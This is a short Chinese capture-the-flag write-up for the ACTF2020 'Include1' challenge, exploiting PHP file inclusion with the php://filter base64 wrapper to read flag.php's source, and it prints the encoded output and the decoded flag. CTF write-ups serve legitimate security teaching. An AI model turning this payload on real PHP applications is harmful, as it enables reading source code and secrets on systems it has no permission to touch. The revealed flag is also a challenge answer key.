[ACTF2020 新生赛]Include1

1.打开环境,看到tips点击,看到url有/?file=flag.php,猜测文件包含

文件包含可以用php伪协议攻击,查看文件

先用php://input试试

payload为/?file=php://input

提示

2.可能php://input被过滤

还有别的伪协议,比如 "php://filter"伪协议" 来进行包含。

当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,阻止其不执行。从而导致任意文件读取。

构造Payload:?file=php://filter/convert.base64-encode/resource=flag.php

发送请求得到base64编码后的flag.php文件源码:

PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7ZTM3MmYwMzUtZmE5OC00OGU0LTk4MjItYTRhOTAwYjAxYjU3fQo=

进行base64解码出来

<?php
echo "Can you find out the flag?";
//flag{e372f035-fa98-48e4-9822-a4a900b01b57}

3.考察了php伪协议漏洞

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值